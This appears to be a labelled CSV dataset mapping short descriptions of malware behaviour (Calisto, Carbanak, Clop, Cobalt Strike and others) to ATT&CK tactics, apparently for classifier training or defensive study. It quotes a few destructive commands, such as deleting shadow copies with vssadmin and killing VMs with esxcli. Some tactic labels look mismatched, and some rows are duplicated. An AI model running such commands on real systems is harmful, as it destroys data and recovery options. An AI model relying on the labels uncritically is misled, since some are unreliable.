Cadelspy has the ability to capture screenshots and webcam photos.,['TA0009:Collection']
Cadelspy has the ability to discover information about the compromised host.,['TA0007:Discovery']
Calisto adds permissions and remote logins to all users.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Calisto uses the zip -r command to compress the data collected on the local system.,['TA0009:Collection']
Calisto collects information on bookmarks from Google Chrome.,['TA0007:Discovery']
Calisto can collect data from user directories.,['TA0009:Collection']
Calisto has the capability to use rm -rf to remove folders and files from the victim's machine.,['TA0005:Defense Evasion']
Calisto presents an input prompt asking for the user's login and password.,"['TA0009:Collection', 'TA0006:Credential Access']"
Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.,['TA0005:Defense Evasion']
Calisto has the capability to upload and download files to the victim's machine.,['TA0011:Command and Control']
Calisto collects Keychain storage data and copies those passwords/tokens to a file.,['TA0006:Credential Access']
Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Calisto uses launchctl to enable screen sharing on the victim’s machine.,['TA0002:Execution']
Calisto has the capability to add its own account to the victim's machine.,['TA0003:Persistence']
Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.,['TA0009:Collection']
Calisto's installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.,['TA0005:Defense Evasion']
Calisto runs the ifconfig command to obtain the IP address from the victim’s machine.,['TA0007:Discovery']
CallMe exfiltrates data to its C2 server over the same protocol as C2 communications.,['TA0010:Exfiltration']
CallMe has the capability to download a file to the victim from the C2 server.,['TA0011:Command and Control']
CallMe uses AES to encrypt C2 traffic.,['TA0011:Command and Control']
CallMe has the capability to create a reverse shell on victims.,['TA0002:Execution']
Cannon exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.,['TA0010:Exfiltration']
Cannon can obtain victim drive information as well as a list of folders in C:\Program Files.,['TA0007:Discovery']
Cannon can download a payload for execution.,['TA0011:Command and Control']
Cannon uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.,['TA0011:Command and Control']
Cannon can obtain a list of processes running on the system.,['TA0007:Discovery']
Cannon can take a screenshot of the desktop.,['TA0009:Collection']
"Cannon can gather system information from the victim’s machine such as the OS version, machine name, and drive information.",['TA0007:Discovery']
Cannon can gather the username from the system.,['TA0007:Discovery']
Cannon can collect the current time zone information from the victim’s machine.,['TA0007:Discovery']
Cannon adds the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Carbanak exfiltrates data in compressed chunks if a message is larger than 4096 bytes .,['TA0010:Exfiltration']
Carbanak has a command to delete files.,['TA0005:Defense Evasion']
Carbanak logs key strokes for configured processes and sends them back to the C2 server.,"['TA0009:Collection', 'TA0006:Credential Access']"
Carbanak can create a Windows account.,['TA0003:Persistence']
Carbanak searches recursively for Outlook personal storage tables files within user directories and sends them back to the C2 server.,['TA0009:Collection']
Carbanak obtains Windows logon password details.,['TA0006:Credential Access']
Carbanak encrypts strings to make analysis more difficult.,['TA0005:Defense Evasion']
Carbanak downloads an executable and injects it directly into a new process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Carbanak lists running processes.,['TA0007:Discovery']
Carbanak checks the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings for proxy configurations information.,['TA0007:Discovery']
Carbanak stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Carbanak has a plugin for VNC and Ammyy Admin Tool.,['TA0011:Command and Control']
Carbanak enables concurrent Remote Desktop Protocol sessions.,['TA0008:Lateral Movement']
Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.,['TA0009:Collection']
Carbanak encodes the message body of HTTP traffic with Base64.,['TA0011:Command and Control']
Carbanak encrypts the message body of HTTP traffic with RC2 . Carbanak also uses XOR with random keys for its communications.,['TA0011:Command and Control']
The Carbanak malware communicates to its command server using HTTP with an encrypted payload.,['TA0011:Command and Control']
Carbanak has a command to create a reverse shell.,['TA0002:Execution']
Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Carberp has installed a bootkit on the system to maintain persistence.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
Carberp has captured credentials when a user performs login through a SSL session.,['TA0009:Collection']
Carberp has hooked several Windows API functions to steal credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Carberp's passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.",['TA0006:Credential Access']
"Carberp's passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.",['TA0006:Credential Access']
Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.,['TA0005:Defense Evasion']
Carberp's bootkit can inject a malicious DLL into the address space of running processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Carberp has used XOR-based encryption to mask C2 server locations within the trojan.,['TA0005:Defense Evasion']
Carberp has exfiltrated data via HTTP to already established C2 servers.,['TA0010:Exfiltration']
Carberp has exploited multiple Windows vulnerabilities and a .NET Runtime Optimization vulnerability for privilege escalation.,['TA0004:Privilege Escalation']
Carberp has created a hidden file in the Startup folder of the current user.,['TA0005:Defense Evasion']
Carberp can download and execute new plugins from the C2 server.,['TA0011:Command and Control']
"Carberp has masqueraded as Windows system file names, as well as ""chkntfs.exe"" and ""syscron.exe"".",['TA0005:Defense Evasion']
Carberp has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.,['TA0002:Execution']
Carberp has collected a list of running processes.,['TA0007:Discovery']
"Carberp has searched the Image File Execution Options registry key for ""Debugger"" within every subkey.",['TA0007:Discovery']
Carberp has maintained persistence by placing itself inside the current user's startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Carberp has used user mode rootkit techniques to remain hidden on the system.,['TA0005:Defense Evasion']
Carberp can capture display screenshots with the screens_dll.dll plugin.,['TA0009:Collection']
Carberp has queried the infected system's registry searching for specific registry keys associated with antivirus products.,['TA0007:Discovery']
Carberp has collected the operating system version from the infected system.,['TA0007:Discovery']
Carberp can start a remote VNC session by downloading a new plugin.,['TA0008:Lateral Movement']
Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Carberp has connected to C2 servers via HTTP.,['TA0011:Command and Control']
Carbon has used RSA encryption for C2 communications.,['TA0011:Command and Control']
Carbon decrypts task and configuration files for execution.,['TA0005:Defense Evasion']
Carbon has a command to inject code into a process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Carbon uses HTTP to send data to the C2 server.,['TA0010:Exfiltration']
Carbon creates a base directory that contains the files and folders that are collected.,['TA0009:Collection']
Carbon uses TCP and UDP for C2.,['TA0011:Command and Control']
Carbon encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.,['TA0005:Defense Evasion']
Carbon uses the net group command.,['TA0007:Discovery']
Carbon can list the processes on the victim’s machine.,['TA0007:Discovery']
Carbon enumerates values in the Registry.,['TA0007:Discovery']
Carbon uses the net view command.,['TA0007:Discovery']
Carbon creates several tasks for later execution to continue persistence on the victim’s machine.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Carbon can collect the IP address of the victims and other computers on the network using the commands: ipconfig -all nbtstat -n, and nbtstat -s.",['TA0007:Discovery']
Carbon uses the netstat -r and netstat -an commands.,['TA0007:Discovery']
Carbon uses the command net time \\127.0.0.1 to get information the system’s time.,['TA0007:Discovery']
Carbon can use HTTP in C2 communications.,['TA0011:Command and Control']
Carbon can use Pastebin to receive C2 commands.,['TA0011:Command and Control']
Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cardinal RAT applies compression to C2 traffic using the ZLIB library.,['TA0009:Collection']
"Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.",['TA0005:Defense Evasion']
Cardinal RAT decodes many of its artifacts and is decrypted after being downloaded.,['TA0005:Defense Evasion']
Cardinal RAT encodes many of its artifacts and is encrypted when downloaded.,['TA0005:Defense Evasion']
Cardinal RAT can communicate over multiple C2 host and port combinations.,['TA0011:Command and Control']
"Cardinal RAT can uninstall itself, including deleting its executable.",['TA0005:Defense Evasion']
Cardinal RAT checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path .,['TA0007:Discovery']
Cardinal RAT can download and execute additional payloads.,['TA0011:Command and Control']
Cardinal RAT can log keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Cardinal RAT lures victims into executing malicious macros embedded within Microsoft Excel documents.,['TA0002:Execution']
Cardinal RAT sets HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load to point to its executable.,['TA0005:Defense Evasion']
"Cardinal RAT contains watchdog functionality that ensures its process is always running, else spawns a new instance.",['TA0007:Discovery']
Cardinal RAT injects into a newly spawned process created from a native Windows executable.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cardinal RAT can act as a reverse proxy.,['TA0011:Command and Control']
Cardinal RAT contains watchdog functionality that periodically ensures HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load is set to point to its executable.,['TA0007:Discovery']
Cardinal RAT establishes Persistence by setting the HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load Registry key to point to its executable.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cardinal RAT can capture screenshots.,['TA0009:Collection']
Cardinal RAT uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.,['TA0011:Command and Control']
"Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.",['TA0007:Discovery']
Cardinal RAT can collect the username from a victim machine.,['TA0007:Discovery']
Cardinal RAT is downloaded using HTTP over port 443.,['TA0011:Command and Control']
Cardinal RAT can execute commands.,['TA0002:Execution']
Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.,['TA0007:Discovery']
Catchamas steals data stored in the clipboard.,['TA0009:Collection']
Catchamas collects keystrokes from the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Catchamas stores the gathered data from the machine in .db files and .bmp files under four separate locations.,['TA0009:Collection']
Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.,['TA0005:Defense Evasion']
Catchamas creates three Registry keys to establish persistence by adding a Windows Service.,['TA0005:Defense Evasion']
Catchamas captures screenshots based on specific keywords in the window’s title.,['TA0009:Collection']
"Catchamas gathers the Mac address, IP address, and the network adapter information from the victim’s machine.",['TA0007:Discovery']
Catchamas adds a new service named NetAdapter to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Caterpillar WebShell has a module to perform brute force attacks on a system.,['TA0006:Credential Access']
Caterpillar WebShell has a module to collect information from the local database.,['TA0009:Collection']
Caterpillar WebShell can upload files over the C2 channel.,['TA0010:Exfiltration']
Caterpillar WebShell can search for files in directories.,['TA0007:Discovery']
Caterpillar WebShell has a module to download and upload files to the system.,['TA0011:Command and Control']
Caterpillar WebShell can obtain a list of local groups of users from a system.,['TA0007:Discovery']
Caterpillar WebShell has a command to modify a Registry key.,['TA0005:Defense Evasion']
Caterpillar WebShell has a module to use a port scanner on a system.,['TA0007:Discovery']
Caterpillar WebShell can gather a list of processes running on the machine.,['TA0007:Discovery']
Caterpillar WebShell has a module to use a rootkit on a system.,['TA0005:Defense Evasion']
"Caterpillar WebShell has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.",['TA0007:Discovery']
Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command.,['TA0007:Discovery']
Caterpillar WebShell can obtain a list of user accounts from a victim's machine.,['TA0007:Discovery']
Caterpillar WebShell can obtain a list of the services from a system.,['TA0007:Discovery']
Caterpillar WebShell can run commands on the compromised asset with CMD functions.,['TA0002:Execution']
ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.,['TA0005:Defense Evasion']
ChChes steals credentials stored inside Internet Explorer.,['TA0006:Credential Access']
ChChes can alter the victim's proxy configuration.,['TA0005:Defense Evasion']
ChChes collects the victim's %TEMP% directory path and version of Internet Explorer.,['TA0007:Discovery']
"ChChes is capable of downloading files, including additional modules.",['TA0011:Command and Control']
ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed .,['TA0005:Defense Evasion']
ChChes collects its process identifier on the victim.,['TA0007:Discovery']
ChChes establishes persistence by adding a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ChChes can encode C2 data with a custom technique that utilizes Base64.,['TA0011:Command and Control']
ChChes can encrypt C2 traffic with AES or RC4.,['TA0011:Command and Control']
"ChChes collects the victim hostname, window resolution, and Microsoft Windows version.",['TA0007:Discovery']
ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.,['TA0011:Command and Control']
Chaes has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts.,['TA0009:Collection']
Chaes can steal login credentials and stored financial information from the browser.,['TA0006:Credential Access']
Chaes has used search order hijacking to load a malicious DLL.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chaes has decrypted an AES encrypted binary file to trigger the download of other files.,['TA0005:Defense Evasion']
Chaes has used encryption for its C2 channel.,['TA0011:Command and Control']
"Chaes has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol.",['TA0010:Exfiltration']
Some versions of Chaes stored its instructions in the Registry.,['TA0005:Defense Evasion']
Chaes can download additional files onto an infected machine.,['TA0011:Command and Control']
Chaes has a module to perform any API hooking it desires.,"['TA0009:Collection', 'TA0006:Credential Access']"
Chaes has used Installutill to download content.,['TA0005:Defense Evasion']
Chaes has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process.,['TA0002:Execution']
Chaes requires the user to click on the malicious Word document to execute the next part of the attack.,['TA0002:Execution']
"Chaes has used an unsigned, crafted DLL module named hha.dll that was designed to look like a legitimate 32-bit Windows DLL.",['TA0005:Defense Evasion']
Chaes can modify Registry values to stored information and establish persistence.,['TA0005:Defense Evasion']
Chaes has used .MSI files as an initial way to start the infection chain.,['TA0005:Defense Evasion']
Chaes used the CreateFileW API function with read permissions to access downloaded payloads.,['TA0002:Execution']
Chaes has used Python scripts for execution and the installation of additional files.,['TA0002:Execution']
Chaes has added persistence via the Registry key software\microsoft\windows\currentversion\run\microsoft windows html help.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chaes can capture screenshots of the infected machine.,['TA0009:Collection']
Chaes has been delivered by sending victims a phishing email containing a malicious .docx file.,['TA0001:Initial Access']
Chaes has used Base64 to encode C2 communications.,['TA0011:Command and Control']
Chaes has used a script that extracts the web session cookie and sends it to the C2 server.,['TA0006:Credential Access']
"Chaes has collected system information, including the machine name and OS version.",['TA0007:Discovery']
Chaes has collected the username and UID from the infected machine.,['TA0007:Discovery']
Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.,['TA0005:Defense Evasion']
Chaes has used VBscript to execute malicious code.,['TA0002:Execution']
Chaes has used HTTP for C2 communications.,['TA0011:Command and Control']
Chaes has used cmd to execute tasks on the system.,['TA0002:Execution']
Chaos conducts brute force attacks against SSH services to gain initial access.,['TA0006:Credential Access']
"After initial compromise, Chaos will download a second stage to establish a more permanent presence on the affected system.",['TA0011:Command and Control']
"Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.",['TA0011:Command and Control']
"Chaos provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
"Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.",['TA0002:Execution']
CharmPower can collect data and files from a compromised host.,['TA0009:Collection']
CharmPower can retrieve C2 domain information from actor-controlled S3 buckets.,['TA0011:Command and Control']
CharmPower can decrypt downloaded modules prior to execution.,['TA0005:Defense Evasion']
CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.,['TA0010:Exfiltration']
CharmPower can send victim data via FTP with credentials hardcoded in the script.,['TA0010:Exfiltration']
CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors’ S3 bucket.,['TA0011:Command and Control']
CharmPower can delete created files from a compromised system.,['TA0005:Defense Evasion']
CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer.,['TA0007:Discovery']
CharmPower has the ability to download additional modules to a compromised host.,['TA0011:Command and Control']
CharmPower can remove persistence-related artifacts from the Registry.,['TA0005:Defense Evasion']
CharmPower can use PowerShell for payload execution and C2 communication.,['TA0002:Execution']
CharmPower has the ability to list running processes through the use of `tasklist`.,['TA0007:Discovery']
CharmPower has the ability to enumerate `Uninstall` registry values.,['TA0007:Discovery']
CharmPower has the ability to capture screenshots.,['TA0009:Collection']
CharmPower can list the installed applications on a compromised host.,['TA0007:Discovery']
CharmPower can send additional modules over C2 encoded with base64.,['TA0011:Command and Control']
CharmPower can send additional modules over C2 encrypted with a simple substitution cipher.,['TA0011:Command and Control']
CharmPower can enumerate the OS version and computer name on a targeted system.,['TA0007:Discovery']
CharmPower has the ability to use ipconfig to enumerate system network settings.,['TA0007:Discovery']
CharmPower can use `netsh wlan show profiles` to list specific Wi-Fi profile details.,['TA0007:Discovery']
CharmPower can use HTTP to communicate with C2.,['TA0011:Command and Control']
CharmPower can download additional modules from actor-controlled Amazon S3 buckets.,['TA0011:Command and Control']
The C# implementation of the CharmPower command execution module can use cmd.,['TA0002:Execution']
CharmPower can use `wmic` to gather information from a system.,['TA0002:Execution']
Cheerscrypt can encrypt data on victim machines using a Sosemanuk stream cipher with an Elliptic-curve Diffie–Hellman generated key.,['TA0040:Impact']
"Cheerscrypt can search for log and VMware-related files with .log, .vmdk, .vmem, .vswp, and .vmsn extensions.",['TA0007:Discovery']
Cheerscrypt has the ability to terminate VM processes on compromised hosts through execution of `esxcli vm process kill`.,['TA0040:Impact']
"Some variants of Cherry Picker use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ""AppInit_DLLs""=""pserver32.dll""","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cherry Picker exfiltrates files over FTP.,['TA0010:Exfiltration']
Recent versions of Cherry Picker delete files and registry keys created by the malware.,['TA0005:Defense Evasion']
China Chopper's server component can upload local files.,['TA0009:Collection']
China Chopper's server component can list directory contents.,['TA0007:Discovery']
China Chopper's server component can download remote files.,['TA0011:Command and Control']
China Chopper's server component can spider authentication portals.,['TA0007:Discovery']
China Chopper's server component can perform brute force password guessing against authentication portals.,['TA0006:Credential Access']
China Chopper's client component is packed with UPX.,['TA0005:Defense Evasion']
China Chopper's server component can change the timestamp of files.,['TA0005:Defense Evasion']
China Chopper's server component executes code sent via HTTP POST commands.,['TA0011:Command and Control']
China Chopper's server component is a Web Shell payload.,['TA0003:Persistence']
China Chopper's server component is capable of opening a command terminal.,['TA0002:Execution']
Chinoxy can use a digitally signed binary to load its dll into memory.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
The Chinoxy dropping function can initiate decryption of its config file.,['TA0005:Defense Evasion']
Chinoxy has encrypted its configuration file.,['TA0005:Defense Evasion']
Chinoxy has used the name `eoffice.exe` in attempt to appear as a legitimate file.,['TA0005:Defense Evasion']
Chinoxy has established persistence via the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` registry key and by loading a dropper to ``.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Chrommme can encrypt and store on disk collected data before exfiltration.,['TA0009:Collection']
Chrommme can collect data from a local system.,['TA0009:Collection']
Chrommme can decrypt its encrypted internal code.,['TA0005:Defense Evasion']
Chrommme can encrypt sections of its code to evade detection.,['TA0005:Defense Evasion']
Chrommme can exfiltrate collected data via C2.,['TA0010:Exfiltration']
Chrommme can download its code from C2.,['TA0011:Command and Control']
Chrommme can store captured system information locally prior to exfiltration.,['TA0009:Collection']
Chrommme can use Windows API including `WinExec` for execution.,['TA0002:Execution']
Chrommme can set itself to sleep before requesting a new command from C2.,['TA0010:Exfiltration']
Chrommme has the ability to capture screenshots.,['TA0009:Collection']
Chrommme has the ability to list drives and obtain the computer name of a compromised host.,['TA0007:Discovery']
Chrommme can enumerate the IP address of a compromised host.,['TA0007:Discovery']
Chrommme can retrieve the username from a targeted system.,['TA0007:Discovery']
Clambling has the ability to use Telnet for communication.,['TA0011:Command and Control']
"Clambling can use Dropbox to download malicious payloads, send commands, and receive information.",['TA0011:Command and Control']
Clambling has the ability to bypass UAC using a `passuac.dll` file.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Clambling has the ability to capture and store clipboard data.,['TA0009:Collection']
"Clambling can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Clambling can collect information from a compromised host.,['TA0009:Collection']
Clambling can deobfuscate its payload prior to execution.,['TA0005:Defense Evasion']
Clambling can send files from a victim's machine to Dropbox.,['TA0010:Exfiltration']
Clambling can browse directories on a compromised host.,['TA0007:Discovery']
Clambling has the ability to set its file attributes to hidden.,['TA0005:Defense Evasion']
Clambling can capture keystrokes on a compromised host.,"['TA0009:Collection', 'TA0006:Credential Access']"
Clambling has gained execution through luring victims into opening malicious files.,['TA0002:Execution']
Clambling can set and delete Registry keys.,['TA0005:Defense Evasion']
Clambling has the ability to enumerate network shares.,['TA0007:Discovery']
Clambling has the ability to use TCP and UDP for communication.,['TA0011:Command and Control']
The Clambling executable has been obfuscated when dropped on a compromised host.,['TA0005:Defense Evasion']
The Clambling dropper can use PowerShell to download the malware.,['TA0002:Execution']
Clambling can enumerate processes on a targeted system.,['TA0007:Discovery']
Clambling can execute binaries through process hollowing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Clambling can inject into the `svchost.exe` process for execution.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Clambling has the ability to enumerate Registry keys, including KEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt\strDataDir to search for a bitcoin wallet.",['TA0007:Discovery']
Clambling can establish persistence by adding a Registry run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Clambling has the ability to capture screenshots.,['TA0009:Collection']
Clambling can create and start services on a compromised host.,['TA0002:Execution']
Clambling has been delivered to victim's machines through malicious e-mail attachments.,['TA0001:Initial Access']
"Clambling can discover the hostname, computer name, and Windows version of a targeted machine.",['TA0007:Discovery']
Clambling can enumerate the IP address of a compromised machine.,['TA0007:Discovery']
Clambling can identify the username on a compromised host.,['TA0007:Discovery']
Clambling can determine the current time.,['TA0007:Discovery']
Clambling can wait 30 minutes before initiating contact with C2.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Clambling can record screen content in AVI format.,['TA0009:Collection']
Clambling has the ability to communicate over HTTP.,['TA0011:Command and Control']
Clambling can use cmd.exe for command execution.,['TA0002:Execution']
Clambling can register itself as a system service to gain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Clop can use code signing to evade detection.,['TA0005:Defense Evasion']
"Clop can encrypt files using AES, RSA, and RC4 and will add the "".clop"" extension to encrypted files.",['TA0040:Impact']
Clop has used a simple XOR operation to decrypt strings.,['TA0005:Defense Evasion']
Clop can uninstall or disable security products.,['TA0005:Defense Evasion']
Clop has searched folders and subfolders for files to encrypt.,['TA0007:Discovery']
Clop can delete the shadow volumes with vssadmin Delete Shadows /all /quiet and can use bcdedit to disable recovery options.,['TA0040:Impact']
Clop can make modifications to Registry keys.,['TA0005:Defense Evasion']
Clop can use msiexec.exe to disable security tools on the system.,['TA0005:Defense Evasion']
"Clop has used built-in API functions such as WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum, GetProcAddress, and VirtualAlloc.",['TA0002:Execution']
Clop can enumerate network shares.,['TA0007:Discovery']
Clop can enumerate all processes on the victim's machine.,['TA0007:Discovery']
Clop can search for processes with antivirus and antimalware product names.,['TA0007:Discovery']
Clop can kill several processes and services related to backups and security solutions.,['TA0040:Impact']
Clop has been packed to help avoid detection.,['TA0005:Defense Evasion']
Clop has checked the keyboard language using the GetKeyboardLayout function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the GetTextCharset function.,['TA0007:Discovery']
Clop has used the sleep command to avoid sandbox detection.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Clop can use cmd.exe to help execute commands on the system.,['TA0002:Execution']
One variant of CloudDuke uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.,['TA0011:Command and Control']
CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.,['TA0011:Command and Control']
One variant of CloudDuke uses HTTP and HTTPS for C2.,['TA0011:Command and Control']
Cobalt Strike can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.,['TA0011:Command and Control']
"Cobalt Strike can download a hosted ""beacon"" payload using BITSAdmin.","['TA0005:Defense Evasion', 'TA0003:Persistence']"
"Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.",['TA0009:Collection']
Cobalt Strike can use a number of known techniques to bypass Windows UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cobalt Strike can use self signed Java applets to execute signed applet attacks.,['TA0005:Defense Evasion']
Cobalt Strike can use a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports.,['TA0011:Command and Control']
Cobalt Strike will break large data sets into smaller chunks for exfiltration.,['TA0010:Exfiltration']
Cobalt Strike can collect data from a local system.,['TA0009:Collection']
Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.,['TA0005:Defense Evasion']
Cobalt Strike has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.,['TA0005:Defense Evasion']
Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution.,['TA0008:Lateral Movement']
Cobalt Strike can determine if the user on an infected machine is in the admin or domain admin group.,['TA0007:Discovery']
Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobalt Strike has the ability to accept a value for HTTP Host Header to enable domain fronting.,['TA0011:Command and Control']
Cobalt Strike can identify targets by querying account groups on a domain contoller.,['TA0007:Discovery']
Cobalt Strike has the ability to load DLLs via reflective injection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.",['TA0002:Execution']
Cobalt Strike can exploit vulnerabilities such as MS14-058.,['TA0004:Privilege Escalation']
Cobalt Strike can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.,['TA0011:Command and Control']
Cobalt Strike can explore files on a compromised system.,['TA0007:Discovery']
Cobalt Strike includes a capability to modify the Beacon payload to eliminate known signatures or unpacking methods.,['TA0005:Defense Evasion']
Cobalt Strike can deliver additional payloads to victim machines.,['TA0011:Command and Control']
"Cobalt Strike can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.",['TA0011:Command and Control']
The Cobalt Strike System Profiler can use JavaScript to perform reconnaissance actions.,['TA0002:Execution']
Cobalt Strike can track key presses with a keylogger module.,"['TA0009:Collection', 'TA0006:Credential Access']"
Cobalt Strike can spawn a job to inject into LSASS memory and dump password hashes.,['TA0006:Credential Access']
Cobalt Strike can use known credentials to run commands and spawn processes as a local user account.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobalt Strike can use net localgroup to list local groups on a system.,['TA0007:Discovery']
Cobalt Strike can make tokens from known credentials.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cobalt Strike can modify Registry values within HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security\AccessVBOM\ to enable the execution of additional code.,['TA0005:Defense Evasion']
Cobalt Strike's Beacon payload is capable of running shell commands without cmd.exe and PowerShell commands without powershell.exe,['TA0002:Execution']
Cobalt Strike can perform port scans from an infected host.,['TA0007:Discovery']
Cobalt Strike can query shared drives on the local system.,['TA0007:Discovery']
"Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications.",['TA0011:Command and Control']
Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.,['TA0005:Defense Evasion']
Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.,['TA0003:Persistence']
Cobalt Strike can spawn processes with alternate PPIDs.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cobalt Strike can perform pass the hash.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Cobalt Strike can execute a payload on a remote host with PowerShell. This technique does not write any data to disk. Cobalt Strike can also use PowerSploit and other scripting frameworks to perform execution.,['TA0002:Execution']
Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands.,['TA0005:Defense Evasion']
Cobalt Strike's Beacon payload can collect information on process details.,['TA0007:Discovery']
Cobalt Strike can use process hollowing for execution.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
